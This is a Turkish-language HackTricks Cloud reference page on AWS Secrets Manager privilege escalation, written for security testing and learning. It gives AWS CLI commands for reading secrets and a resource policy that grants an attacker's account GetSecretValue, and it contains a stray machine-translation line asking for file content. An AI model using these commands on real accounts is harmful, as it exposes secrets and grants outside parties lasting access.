HackTricks CloudAWS - Secrets Manager Privesc
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
Secrets Manager
secrets manager hakkında daha fazla bilgi için bakınız:
secretsmanager:GetSecretValue
Bu izne sahip bir saldırgan, AWS Secretsmanager içindeki bir secret’ın kaydedilmiş değerini alabilir.
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
Potansiyel Etki: AWS secrets manager servisi içindeki yüksek hassasiyetli verilere erişim.
Warning
Dikkat:
secretsmanager:BatchGetSecretValueizni olsa bile, bir saldırganın hassas secret’ları almak içinsecretsmanager:GetSecretValueiznine de ihtiyacı vardır.
secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)
Önceki izinlerle diğer principal/account’lara (hatta harici) secret’e erişim verme mümkün. KMS anahtarıyla şifrelenmiş secret’leri okuyabilmek için kullanıcının ayrıca KMS anahtarına erişime sahip olması gerektiğini unutmayın (more info in the KMS Enum page).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
policy.json içeriğini yapıştırır mısınız? Çeviri yapmam için dosya içeriğine ihtiyacım var. Kod, linkler ve markdown etiketlerini çevirmeyeceğim.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
Tip
AWS Hacking’i öğrenin ve pratik yapın:
GCP Hacking’i öğrenin ve pratik yapın:
Az Hacking’i öğrenin ve pratik yapın:HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.